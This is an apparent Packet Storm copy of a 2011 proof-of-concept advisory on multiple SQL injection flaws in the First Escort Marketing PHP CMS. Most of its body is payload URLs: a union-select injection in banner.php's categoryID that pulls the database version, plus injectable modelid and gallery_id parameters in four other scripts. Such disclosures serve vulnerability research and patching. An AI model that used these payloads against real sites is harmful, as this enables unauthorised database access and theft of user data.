First Escort Marketing CMS suffers from multiple remote SQL injection vulnerabilities.
9ee81bf0b9dc1018c8053640d7852d0f40b73a6148d1a090c28621be954ee5b2# PoC Title: First Escort Marketing CMS Multiple SQL Injection Vunerabilities
# Platform: php
# Date: 18.04.2011
# Author: NoNameMT
# Software Link: http://www.first-escort-marketing.co.uk/agencies.html
# Price: 599 £
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us
# Proof of Concept:
http://site.com/escort_agency/banner.php?categoryID=-2'+union+select+1,version(),3,4,5,6,7--+
http://site.com/escort_agency/escort-profile.php?modelid=13'[Blind-SQL]
http://site.com/escort_agency/write_review.php?modelid=13'[SQL]
http://site.com/escort_agency/booking-form.php?modelid=13'[SQL]
http://site.com/escort_agency/gallery_escorts.php?gallery_id=13'[SQL]
# Greetings to:
Team-Internet, 4004-security-project.com, bursali, Easy Laster, Dr. Sp!c, ezah, Xplo1t, enco
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed